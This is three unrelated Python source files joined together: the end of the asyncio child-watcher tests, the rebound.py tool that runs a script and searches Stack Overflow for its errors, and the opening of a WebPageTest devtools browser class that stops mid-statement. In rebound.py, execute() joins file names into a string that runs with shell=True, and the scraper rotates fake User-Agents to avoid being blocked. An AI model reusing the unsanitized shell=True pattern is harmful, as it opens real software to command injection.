class FastChildWatcherTests (ChildWatcherTestsMixin, test_utils.TestCase):
def create_watcher(self):
return asyncio.FastChildWatcher()
class PolicyTests(unittest.TestCase):
def create_policy(self):
return asyncio.DefaultEventLoopPolicy()
def test_get_default_child_watcher(self):
policy = self.create_policy()
self.assertIsNone(policy._watcher)
watcher = policy.get_child_watcher()
self.assertIsInstance(watcher, asyncio.ThreadedChildWatcher)
self.assertIs(policy._watcher, watcher)
self.assertIs(watcher, policy.get_child_watcher())
def test_get_child_watcher_after_set(self):
policy = self.create_policy()
watcher = asyncio.FastChildWatcher()
policy.set_child_watcher(watcher)
self.assertIs(policy._watcher, watcher)
self.assertIs(watcher, policy.get_child_watcher())
def test_get_child_watcher_thread(self):
def f():
policy.set_event_loop(policy.new_event_loop())
self.assertIsInstance(policy.get_event_loop(),
asyncio.AbstractEventLoop)
watcher = policy.get_child_watcher()
self.assertIsInstance(watcher, asyncio.SafeChildWatcher)
self.assertIsNone(watcher._loop)
policy.get_event_loop().close()
policy = self.create_policy()
policy.set_child_watcher(asyncio.SafeChildWatcher())
th = threading.Thread(target=f)
th.start()
th.join()
def test_child_watcher_replace_mainloop_existing(self):
policy = self.create_policy()
loop = policy.get_event_loop()
# Explicitly setup SafeChildWatcher,
# default ThreadedChildWatcher has no _loop property
watcher = asyncio.SafeChildWatcher()
policy.set_child_watcher(watcher)
watcher.attach_loop(loop)
self.assertIs(watcher._loop, loop)
new_loop = policy.new_event_loop()
policy.set_event_loop(new_loop)
self.assertIs(watcher._loop, new_loop)
policy.set_event_loop(None)
self.assertIs(watcher._loop, None)
loop.close()
new_loop.close()
class TestFunctional(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
def tearDown(self):
self.loop.close()
asyncio.set_event_loop(None)
def test_add_reader_invalid_argument(self):
def assert_raises():
return self.assertRaisesRegex(ValueError, r'Invalid file object')
cb = lambda: None
with assert_raises():
self.loop.add_reader(object(), cb)
with assert_raises():
self.loop.add_writer(object(), cb)
with assert_raises():
self.loop.remove_reader(object())
with assert_raises():
self.loop.remove_writer(object())
def test_add_reader_or_writer_transport_fd(self):
def assert_raises():
return self.assertRaisesRegex(
RuntimeError,
r'File descriptor .* is used by transport')
async def runner():
tr, pr = await self.loop.create_connection(
lambda: asyncio.Protocol(), sock=rsock)
try:
cb = lambda: None
with assert_raises():
self.loop.add_reader(rsock, cb)
with assert_raises():
self.loop.add_reader(rsock.fileno(), cb)
with assert_raises():
self.loop.remove_reader(rsock)
with assert_raises():
self.loop.remove_reader(rsock.fileno())
with assert_raises():
self.loop.add_writer(rsock, cb)
with assert_raises():
self.loop.add_writer(rsock.fileno(), cb)
with assert_raises():
self.loop.remove_writer(rsock)
with assert_raises():
self.loop.remove_writer(rsock.fileno())
finally:
tr.close()
rsock, wsock = socket.socketpair()
try:
self.loop.run_until_complete(runner())
finally:
rsock.close()
wsock.close()
if __name__ == '__main__':
unittest.main()
|
rebound.py
|
##########
## GLOBALS
##########
import urwid
import re
import sys
import os
from bs4 import BeautifulSoup
import requests
from queue import Queue
from subprocess import PIPE, Popen
from threading import Thread
import webbrowser
import time
from urwid.widget import (BOX, FLOW, FIXED)
import random
SO_URL = "https://stackoverflow.com"
# ASCII color codes
GREEN = '\033[92m'
GRAY = '\033[90m'
CYAN = '\033[36m'
RED = '\033[31m'
YELLOW = '\033[33m'
END = '\033[0m'
UNDERLINE = '\033[4m'
BOLD = '\033[1m'
# Scroll actions
SCROLL_LINE_UP = "line up"
SCROLL_LINE_DOWN = "line down"
SCROLL_PAGE_UP = "page up"
SCROLL_PAGE_DOWN = "page down"
SCROLL_TO_TOP = "to top"
SCROLL_TO_END = "to end"
# Scrollbar positions
SCROLLBAR_LEFT = "left"
SCROLLBAR_RIGHT = "right"
USER_AGENTS = [
"Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Firefox/59",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)',
'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
]
##################
## FILE ATTRIBUTES
##################
def get_language(file_path):
"""Returns the language a file is written in."""
if file_path.endswith(".py"):
return "python3"
elif file_path.endswith(".js"):
return "node"
elif file_path.endswith(".go"):
return "go run"
elif file_path.endswith(".rb"):
return "ruby"
elif file_path.endswith(".java"):
return 'javac' # Compile Java Source File
elif file_path.endswith(".class"):
return 'java' # Run Java Class File
elif file_path.endswith(".cpp"):
return "cplusplus"
else:
return '' # Unknown language
def get_error_message(error, language):
"""Filters the stack trace from stderr and returns only the error message."""
if error == '':
return None
elif language == "python3":
if any(e in error for e in ["KeyboardInterrupt", "SystemExit", "GeneratorExit"]): # Non-compiler errors
return None
else:
return error.split('\n')[-2].strip()
elif language == "node":
return error.split('\n')[4][1:]
elif language == "go run":
return error.split('\n')[1].split(": ", 1)[1][1:]
elif language == "ruby":
error_message = error.split('\n')[0]
return error_message[error_message.rfind(": ") + 2:]
elif language == "javac":
m = re.search(r'.*error:(.*)', error.split('\n')[0])
return m.group(1) if m else None
elif language == "java":
for line in error.split('\n'):
# Multiple error formats
m = re.search(r'.*(Exception|Error):(.*)', line)
if m and m.group(2):
return m.group(2)
m = re.search(r'Exception in thread ".*" (.*)', line)
if m and m.group(1):
return m.group(1)
return None
#################
## FILE EXECUTION
#################
## Helper Functions ##
def read(pipe, funcs):
"""Reads and pushes piped output to a shared queue and appropriate lists."""
for line in iter(pipe.readline, b''):
for func in funcs:
func(line.decode("utf-8"))
pipe.close()
def write(get):
"""Pulls output from shared queue and prints to terminal."""
for line in iter(get, None):
print(line)
## Main ##
def execute(command):
"""Executes a given command and clones stdout/err to both variables and the
terminal (in real-time)."""
print(command)
if command[0]=='cplusplus':
command[0] = 'g++'
command = " ".join(command)
print(command)
process = Popen(
command,
cwd=None,
shell=True,
close_fds=True,
stdout=PIPE,
stderr=PIPE,
bufsize=1
)
output, errors = [], []
pipe_queue = Queue() # Wowee, thanks CS 225
# Threads for reading stdout and stderr pipes and pushing to a shared queue
stdout_thread = Thread(target=read, args=(process.stdout, [pipe_queue.put, output.append]))
stderr_thread = Thread(target=read, args=(process.stderr, [pipe_queue.put, errors.append]))
writer_thread = Thread(target=write, args=(pipe_queue.get,)) # Thread for printing items in the queue
# Spawns each thread
for thread in (stdout_thread, stderr_thread, writer_thread):
thread.daemon = True
thread.start()
process.wait()
for thread in (stdout_thread, stderr_thread):
thread.join()
pipe_queue.put(None)
output = ' '.join(output)
errors = ' '.join(errors)
if "java" != command[0] and not os.path.isfile(command[1]): # File doesn't exist, for java, command[1] is a class name instead of a file
return (None, None)
else:
return (output, errors)
###############
## WEB SCRAPING
###############
## Helper Functions ##
def stylize_code(soup):
"""Identifies and stylizes code in a question or answer."""
# TODO: Handle blockquotes and markdown
stylized_text = []
code_blocks = [block.get_text() for block in soup.find_all("code")]
blockquotes = [block.get_text() for block in soup.find_all("blockquote")]
newline = False
for child in soup.recursiveChildGenerator():
name = getattr(child, "name", None)
if name is None: # Leaf (terminal) node
if child in code_blocks:
if newline: # Code block
#if code_blocks.index(child) == len(code_blocks) - 1: # Last code block
#child = child[:-1]
stylized_text.append(("code", u"\n%s" % str(child)))
newline = False
else: # In-line code
stylized_text.append(("code", u"%s" % str(child)))
else: # Plaintext
newline = child.endswith('\n')
stylized_text.append(u"%s" % str(child))
if type(stylized_text[-2]) == tuple:
# Remove newline from questions/answers that end with a code block
if stylized_text[-2][1].endswith('\n'):
stylized_text[-2] = ("code", stylized_text[-2][1][:-1])
return urwid.Text(stylized_text)
def get_search_results(soup):
"""Returns a list of dictionaries containing each search result."""
search_results = []
for result in soup.find_all("div", class_="question-summary search-result"):
title_container = result.find_all("div", class_="result-link")[0].find_all("a")[0]
if result.find_all("div", class_="status answered") != []: # Has answers
answer_count = int(result.find_all("div", class_="status answered")[0].find_all("strong")[0].text)
elif result.find_all("div", class_="status answered-accepted") != []: # Has an accepted answer (closed)
answer_count = int(result.find_all("div", class_="status answered-accepted")[0].find_all("strong")[0].text)
else: # No answers
answer_count = 0
search_results.append({
"Title": title_container["title"],
#"Body": result.find_all("div", class_="excerpt")[0].text,
#"Votes": int(result.find_all("span", class_="vote-count-post ")[0].find_all("strong")[0].text),
"Answers": answer_count,
"URL": SO_URL + title_container["href"]
})
return search_results
def souper(url):
"""Turns a given URL into a BeautifulSoup object."""
try:
html = requests.get(url, headers={"User-Agent": random.choice(USER_AGENTS)})
except requests.exceptions.RequestException:
sys.stdout.write("\n%s%s%s" % (RED, "Rebound was unable to fetch Stack Overflow results. "
"Please check that you are connected to the internet.\n", END))
sys.exit(1)
if re.search("\.com/nocaptcha", html.url): # URL is a captcha page
return None
else:
return BeautifulSoup(html.text, "html.parser")
## Main ##
def search_stackoverflow(query):
"""Wrapper function for get_search_results."""
soup = souper(SO_URL + "/search?pagesize=50&q=%s" % query.replace(' ', '+'))
# TODO: Randomize the user agent
if soup == None:
return (None, True)
else:
return (get_search_results(soup), False)
def get_question_and_answers(url):
"""Returns details about a given question and list of its answers."""
soup = souper(url)
if soup == None: # Captcha page
return "Sorry, Stack Overflow blocked our request. Try again in a couple seconds.", "", "", ""
else:
question_title = soup.find_all('a', class_="question-hyperlink")[0].get_text()
question_stats = soup.find("div", class_="js-vote-count").get_text() # Vote count
try:
question_stats = question_stats + " Votes | " + '|'.join((((soup.find_all("div", class_="module question-stats")[0].get_text())
.replace('\n', ' ')).replace(" ", " | ")).split('|')[:2]) # Vote count, submission date, view count
except IndexError:
question_stats = "Could not load statistics."
question_desc = stylize_code(soup.find_all("div", class_="post-text")[0]) # TODO: Handle duplicates
question_stats = ' '.join(question_stats.split())
answers = [stylize_code(answer) for answer in soup.find_all("div", class_="post-text")][1:]
if len(answers) == 0:
answers.append(urwid.Text(("no answers", u"\nNo answers for this question.")))
return question_title, question_desc, question_stats, answers
############
## INTERFACE
############
## Helper Classes ##
class Scrollable(urwid.WidgetDecoration):
# TODO: Fix scrolling behavior (works with up/down keys, not with cursor)
def sizing(self):
return frozenset([BOX,])
def selectable(self):
return True
def __init__(self, widget):
"""Box widget (wrapper) that makes a fixed or flow widget vertically scrollable."""
self._trim_top = 0
self._scroll_action = None
self._forward_keypress = None
self._old_cursor_coords = None
self._rows_max_cached = 0
self._rows_max_displayable = 0
self.__super.__init__(widget)
def render(self, size, focus=False):
maxcol, maxrow = size
# Render complete original widget
ow = self._original_widget
ow_size = self._get_original_widget_size(size)
canv = urwid.CompositeCanvas(ow.render(ow_size, focus))
canv_cols, canv_rows = canv.cols(), canv.rows()
if canv_cols <= maxcol:
pad_width = maxcol - canv_cols
if pad_width > 0: # Canvas is narrower than available horizontal space
canv.pad_trim_left_right(0, pad_width)
if canv_rows <= maxrow:
fill_height = maxrow - canv_rows
if fill_height > 0: # Canvas is lower than available vertical space
canv.pad_trim_top_bottom(0, fill_height)
self._rows_max_displayable = maxrow
if canv_cols <= maxcol and canv_rows <= maxrow: # Canvas is small enough to fit without trimming
return canv
self._adjust_trim_top(canv, size)
# Trim canvas if necessary
trim_top = self._trim_top
trim_end = canv_rows - maxrow - trim_top
trim_right = canv_cols - maxcol
if trim_top > 0:
canv.trim(trim_top)
if trim_end > 0:
canv.trim_end(trim_end)
if trim_right > 0:
canv.pad_trim_left_right(0, -trim_right)
# Disable cursor display if cursor is outside of visible canvas parts
if canv.cursor is not None:
curscol, cursrow = canv.cursor
if cursrow >= maxrow or cursrow < 0:
canv.cursor = None
# Let keypress() know if original_widget should get keys
self._forward_keypress = bool(canv.cursor)
return canv
def keypress(self, size, key):
if self._forward_keypress:
ow = self._original_widget
ow_size = self._get_original_widget_size(size)
# Remember previous cursor position if possible
if hasattr(ow, "get_cursor_coords"):
self._old_cursor_coords = ow.get_cursor_coords(ow_size)
key = ow.keypress(ow_size, key)
if key is None:
return None
# Handle up/down, page up/down, etc
command_map = self._command_map
if command_map[key] == urwid.CURSOR_UP:
self._scroll_action = SCROLL_LINE_UP
elif command_map[key] == urwid.CURSOR_DOWN:
self._scroll_action = SCROLL_LINE_DOWN
elif command_map[key] == urwid.CURSOR_PAGE_UP:
self._scroll_action = SCROLL_PAGE_UP
elif command_map[key] == urwid.CURSOR_PAGE_DOWN:
self._scroll_action = SCROLL_PAGE_DOWN
elif command_map[key] == urwid.CURSOR_MAX_LEFT: # "home"
self._scroll_action = SCROLL_TO_TOP
elif command_map[key] == urwid.CURSOR_MAX_RIGHT: # "end"
self._scroll_action = SCROLL_TO_END
else:
return key
self._invalidate()
def mouse_event(self, size, event, button, col, row, focus):
ow = self._original_widget
if hasattr(ow, "mouse_event"):
ow_size = self._get_original_widget_size(size)
row += self._trim_top
return ow.mouse_event(ow_size, event, button, col, row, focus)
else:
return False
def _adjust_trim_top(self, canv, size):
"""Adjust self._trim_top according to self._scroll_action"""
action = self._scroll_action
self._scroll_action = None
maxcol, maxrow = size
trim_top = self._trim_top
canv_rows = canv.rows()
if trim_top < 0:
# Negative trim_top values use bottom of canvas as reference
trim_top = canv_rows - maxrow + trim_top + 1
if canv_rows <= maxrow:
self._trim_top = 0 # Reset scroll position
return
def ensure_bounds(new_trim_top):
return max(0, min(canv_rows - maxrow, new_trim_top))
if action == SCROLL_LINE_UP:
self._trim_top = ensure_bounds(trim_top - 1)
elif action == SCROLL_LINE_DOWN:
self._trim_top = ensure_bounds(trim_top + 1)
elif action == SCROLL_PAGE_UP:
self._trim_top = ensure_bounds(trim_top - maxrow+1)
elif action == SCROLL_PAGE_DOWN:
self._trim_top = ensure_bounds(trim_top + maxrow-1)
elif action == SCROLL_TO_TOP:
self._trim_top = 0
elif action == SCROLL_TO_END:
self._trim_top = canv_rows - maxrow
else:
self._trim_top = ensure_bounds(trim_top)
if self._old_cursor_coords is not None and self._old_cursor_coords != canv.cursor:
self._old_cursor_coords = None
curscol, cursrow = canv.cursor
if cursrow < self._trim_top:
self._trim_top = cursrow
elif cursrow >= self._trim_top + maxrow:
self._trim_top = max(0, cursrow - maxrow + 1)
def _get_original_widget_size(self, size):
ow = self._original_widget
sizing = ow.sizing()
if FIXED in sizing:
return ()
elif FLOW in sizing:
return (size[0],)
def get_scrollpos(self, size=None, focus=False):
return self._trim_top
def set_scrollpos(self, position):
self._trim_top = int(position)
self._invalidate()
def rows_max(self, size=None, focus=False):
if size is not None:
ow = self._original_widget
ow_size = self._get_original_widget_size(size)
sizing = ow.sizing()
if FIXED in sizing:
self._rows_max_cached = ow.pack(ow_size, focus)[1]
elif FLOW in sizing:
self._rows_max_cached = ow.rows(ow_size, focus)
else:
raise RuntimeError("Not a flow/box widget: %r" % self._original_widget)
return self._rows_max_cached
@property
def scroll_ratio(self):
return self._rows_max_cached / self._rows_max_displayable
class ScrollBar(urwid.WidgetDecoration):
# TODO: Change scrollbar size and color(?)
def sizing(self):
return frozenset((BOX,))
def selectable(self):
return True
def __init__(self, widget, thumb_char=u'\u2588', trough_char=' ',
side=SCROLLBAR_RIGHT, width=1):
"""Box widget that adds a scrollbar to `widget`."""
self.__super.__init__(widget)
self._thumb_char = thumb_char
self._trough_char = trough_char
self.scrollbar_side = side
self.scrollbar_width = max(1, width)
self._original_widget_size = (0, 0)
self._dragging = False
def render(self, size, focus=False):
maxcol, maxrow = size
ow = self._original_widget
ow_base = self.scrolling_base_widget
ow_rows_max = ow_base.rows_max(size, focus)
if ow_rows_max <= maxrow: # Canvas fits without scrolling - no scrollbar needed
self._original_widget_size = size
return ow.render(size, focus)
sb_width = self._scrollbar_width
self._original_widget_size = ow_size = (maxcol-sb_width, maxrow)
ow_canv = ow.render(ow_size, focus)
pos = ow_base.get_scrollpos(ow_size, focus)
posmax = ow_rows_max - maxrow
# Thumb shrinks/grows according to the ratio of
# <number of visible lines> / <number of total lines>
thumb_weight = min(1, maxrow / max(1, ow_rows_max))
thumb_height = max(1, round(thumb_weight * maxrow))
# Thumb may only touch top/bottom if the first/last row is visible
top_weight = float(pos) / max(1, posmax)
top_height = int((maxrow-thumb_height) * top_weight)
if top_height == 0 and top_weight > 0:
top_height = 1
# Bottom part is remaining space
bottom_height = maxrow - thumb_height - top_height
assert thumb_height + top_height + bottom_height == maxrow
# Create scrollbar canvas
top = urwid.SolidCanvas(self._trough_char, sb_width, top_height)
thumb = urwid.SolidCanvas(self._thumb_char, sb_width, thumb_height)
bottom = urwid.SolidCanvas(self._trough_char, sb_width, bottom_height)
sb_canv = urwid.CanvasCombine([
(top, None, False),
(thumb, None, False),
(bottom, None, False),
])
combinelist = [(ow_canv, None, True, ow_size[0]), (sb_canv, None, False, sb_width)]
if self._scrollbar_side != SCROLLBAR_LEFT:
return urwid.CanvasJoin(combinelist)
else:
return urwid.CanvasJoin(reversed(combinelist))
@property
def scrollbar_width(self):
return max(1, self._scrollbar_width)
@scrollbar_width.setter
def scrollbar_width(self, width):
self._scrollbar_width = max(1, int(width))
self._invalidate()
@property
def scrollbar_side(self):
return self._scrollbar_side
@scrollbar_side.setter
def scrollbar_side(self, side):
if side not in (SCROLLBAR_LEFT, SCROLLBAR_RIGHT):
raise ValueError("scrollbar_side must be 'left' or 'right', not %r" % side)
self._scrollbar_side = side
self._invalidate()
@property
def scrolling_base_widget(self):
"""Nearest `base_widget` that is compatible with the scrolling API."""
def orig_iter(w):
while hasattr(w, "original_widget"):
w = w.original_widget
yield w
yield w
def is_scrolling_widget(w):
return hasattr(w, "get_scrollpos") and hasattr(w, "rows_max")
for w in orig_iter(self):
if is_scrolling_widget(w):
return w
@property
def scrollbar_column(self):
if self.scrollbar_side == SCROLLBAR_LEFT:
return 0
if self.scrollbar_side == SCROLLBAR_RIGHT:
return self._original_widget_size[0]
def keypress(self, size, key):
return self._original_widget.keypress(self._original_widget_size, key)
def mouse_event(self, size, event, button, col, row, focus):
ow = self._original_widget
ow_size = self._original_widget_size
handled = False
if hasattr(ow, "mouse_event"):
handled = ow.mouse_event(ow_size, event, button, col, row, focus)
if not handled and hasattr(ow, "set_scrollpos"):
if button == 4: # Scroll wheel up
pos = ow.get_scrollpos(ow_size)
if pos > 0:
ow.set_scrollpos(pos - 1)
return True
elif button == 5: # Scroll wheel down
pos = ow.get_scrollpos(ow_size)
ow.set_scrollpos(pos + 1)
return True
elif col == self.scrollbar_column:
ow.set_scrollpos(int(row*ow.scroll_ratio))
if event == "mouse press":
self._dragging = True
elif event == "mouse release":
self._dragging = False
elif self._dragging:
ow.set_scrollpos(int(row*ow.scroll_ratio))
if event == "mouse release":
self._dragging = False
return False
class SelectableText(urwid.Text):
def selectable(self):
return True
def keypress(self, size, key):
return key
## Helper Functions ##
def interleave(a, b):
result = []
while a and b:
result.append(a.pop(0))
result.append(b.pop(0))
result.extend(a)
result.extend(b)
return result
## Main ##
class App(object):
def __init__(self, search_results):
self.search_results, self.viewing_answers = search_results, False
self.palette = [
("title", "light cyan,bold", "default", "standout"),
("stats", "light green", "default", "standout"),
("menu", "black", "light cyan", "standout"),
("reveal focus", "black", "light cyan", "standout"),
("no answers", "light red", "default", "standout"),
("code", "brown", "default", "standout")
]
self.menu = urwid.Text([
u'\n',
("menu", u" ENTER "), ("light gray", u" View answers "),
("menu", u" B "), ("light gray", u" Open browser "),
("menu", u" Q "), ("light gray", u" Quit"),
])
results = list(map(lambda result: urwid.AttrMap(SelectableText(self._stylize_title(result)), None, "reveal focus"), self.search_results)) # TODO: Add a wrap='clip' attribute
content = urwid.SimpleListWalker(results)
self.content_container = urwid.ListBox(content)
layout = urwid.Frame(body=self.content_container, footer=self.menu)
self.main_loop = urwid.MainLoop(layout, self.palette, unhandled_input=self._handle_input)
self.original_widget = self.main_loop.widget
self.main_loop.run()
def _handle_input(self, input):
if input == "enter": # View answers
url = self._get_selected_link()
if url != None:
self.viewing_answers = True
question_title, question_desc, question_stats, answers = get_question_and_answers(url)
pile = urwid.Pile(self._stylize_question(question_title, question_desc, question_stats) + [urwid.Divider('*')] +
interleave(answers, [urwid.Divider('-')] * (len(answers) - 1)))
padding = ScrollBar(Scrollable(urwid.Padding(pile, left=2, right=2)))
#filler = urwid.Filler(padding, valign="top")
linebox = urwid.LineBox(padding)
menu = urwid.Text([
u'\n',
("menu", u" ESC "), ("light gray", u" Go back "),
("menu", u" B "), ("light gray", u" Open browser "),
("menu", u" Q "), ("light gray", u" Quit"),
])
self.main_loop.widget = urwid.Frame(body=urwid.Overlay(linebox, self.content_container, "center", ("relative", 60), "middle", 23), footer=menu)
elif input in ('b', 'B'): # Open link
url = self._get_selected_link()
if url != None:
webbrowser.open(url)
elif input == "esc": # Close window
if self.viewing_answers:
self.main_loop.widget = self.original_widget
self.viewing_answers = False
else:
raise urwid.ExitMainLoop()
elif input in ('q', 'Q'): # Quit
raise urwid.ExitMainLoop()
def _get_selected_link(self):
focus_widget, idx = self.content_container.get_focus() # Gets selected item
title = focus_widget.base_widget.text
for result in self.search_results:
if title == self._stylize_title(result): # Found selected title's search_result dict
return result["URL"]
def _stylize_title(self, search_result):
if search_result["Answers"] == 1:
return "%s (1 Answer)" % search_result["Title"]
else:
return "%s (%s Answers)" % (search_result["Title"], search_result["Answers"])
def _stylize_question(self, title, desc, stats):
new_title = urwid.Text(("title", u"%s" % title))
new_stats = urwid.Text(("stats", u"%s\n" % stats))
return [new_title, desc, new_stats]
#######
## MAIN
#######
## Helper Functions ##
def confirm(question):
"""Prompts a given question and handles user input."""
valid = {"yes": True, 'y': True, "ye": True,
"no": False, 'n': False, '': True}
prompt = " [Y/n] "
while True:
print(BOLD + CYAN + question + prompt + END)
choice = input().lower()
if choice in valid:
return valid[choice]
print("Please respond with 'yes' or 'no' (or 'y' or 'n').\n")
def print_help():
"""Prints usage instructions."""
print("%sRebound, V1.1.9a1 - Made by @shobrook%s\n" % (BOLD, END))
print("Command-line tool that automatically searches Stack Overflow and displays results in your terminal when you get a compiler error.")
print("\n\n%sUsage:%s $ rebound %s[file_name]%s\n" % (UNDERLINE, END, YELLOW, END))
print("\n$ python3 %stest.py%s => $ rebound %stest.py%s" % (YELLOW, END, YELLOW, END))
print("\n$ node %stest.js%s => $ rebound %stest.js%s\n" % (YELLOW, END, YELLOW, END))
print("\nIf you just want to query Stack Overflow, use the -q parameter: $ rebound -q %sWhat is an array comprehension?%s\n\n" % (YELLOW, END))
## Main ##
def main():
if len(sys.argv) == 1 or sys.argv[1].lower() == "-h" or sys.argv[1].lower() == "--help":
print_help()
elif sys.argv[1].lower() == "-q" or sys.argv[1].lower() == "--query":
query = ' '.join(sys.argv[2:])
search_results, captcha = search_stackoverflow(query)
if search_results != []:
if captcha:
print("\n%s%s%s" % (RED, "Sorry, Stack Overflow blocked our request. Try again in a minute.\n", END))
return
else:
App(search_results) # Opens interface
else:
print("\n%s%s%s" % (RED, "No Stack Overflow results found.\n", END))
else:
language = get_language(sys.argv[1].lower()) # Gets the language name
if language == '': # Unknown language
print("\n%s%s%s" % (RED, "Sorry, Rebound doesn't support this file type.\n", END))
return
file_path = sys.argv[1:]
if language == 'java':
file_path = [f.replace('.class', '') for f in file_path]
output, error = execute([language] + file_path) # Compiles the file and pipes stdout
if (output, error) == (None, None): # Invalid file
return
error_msg = get_error_message(error, language) # Prepares error message for search
if error_msg != None:
language = 'java' if language == 'javac' else language # Fix language compiler command
query = "%s %s" % (language, error_msg)
search_results, captcha = search_stackoverflow(query)
if search_results != []:
if captcha:
print("\n%s%s%s" % (RED, "Sorry, Stack Overflow blocked our request. Try again in a minute.\n", END))
return
elif confirm("\nDisplay Stack Overflow results?"):
App(search_results) # Opens interface
else:
print("\n%s%s%s" % (RED, "No Stack Overflow results found.\n", END))
else:
print("\n%s%s%s" % (CYAN, "No error detected :)\n", END))
return
|
devtools_browser.py
|
# Copyright 2019 WebPageTest LLC.
# Copyright 2017 Google Inc.
# Use of this source code is governed by the Apache 2.0 license that can be
# found in the LICENSE file.
"""Base class support for browsers that speak the dev tools protocol"""
import glob
import gzip
import io
import logging
import os
import re
import shutil
import subprocess
import sys
import threading
import time
if (sys.version_info > (3, 0)):
from time import monotonic
unicode = str
GZIP_TEXT = 'wt'
else:
from monotonic import monotonic
GZIP_TEXT = 'w'
try:
import ujson as json
except BaseException:
import json
from .optimization_checks import OptimizationChecks
class DevtoolsBrowser(object):
"""Devtools Browser base"""
CONNECT_TIME_LIMIT = 120
def __init__(self, options, job, use_devtools_video=True):
self.options = options
self.job = job
self.devtools = None
self.task = None
self.event_name = None
self.browser_version = None
self.device_pixel_ratio = None
self.use_devtools_video = use_devtools_video
self.lighthouse_command = None
self.devtools_screenshot = True
self.support_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'support')
self.script_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'js')
def connect(self, task):
"""Connect to the dev tools interface"""
ret = False
from internal.devtools import DevTools
self.devtools = DevTools(self.options, self.job, task, self.use_devtools_video)
if task['running_lighthouse']:
ret = self.devtools.wait_for_available(self.CONNECT_TIME_LIMIT)
else:
if self.devtools.connect(self.CONNECT_TIME_LIMIT):
logging.debug("Devtools connected")
ret = True
else:
task['error'] = "Error connecting to dev tools interface"
logging.critical(task['error'])
self.devtools = None
return ret
def disconnect(self):
"""Disconnect from dev tools"""
if self.devtools is not None:
# Always navigate to about:blank after finishing in case the tab is
# remembered across sessions
if self.task is not None and self.task['error'] is None:
self.devtools.send_command('Page.navigate', {'url': 'about:blank'}, wait=True)
self.devtools.close()
self.devtools = None
def prepare_browser(self, task):
"""Prepare the running browser (mobile emulation, UA string, etc"""
if self.devtools is not None:
# Figure out the native viewport size
if not self.options.android:
size = self.devtools.execute_js("[window.innerWidth, window.innerHeight]")
if size is not None and len(size) == 2:
task['actual_viewport'] = {"width": size[0], "height": size[1]}
# Get the native device pixel ratio
if self.device_pixel_ratio is None:
self.device_pixel_ratio = 1.0
try:
ratio = self.devtools.execute_js('window.devicePixelRatio')
if ratio is not None:
self.device_pixel_ratio = max(1.0, float(ratio))
except Exception:
pass
# Clear the caches
if not task['cached']:
self.devtools.send_command("Network.clearBrowserCache", {},
wait=True)
self.devtools.send_command("Network.clearBrowserCookies", {},
wait=True)
# Mobile Emulation
if not self.options.android and \
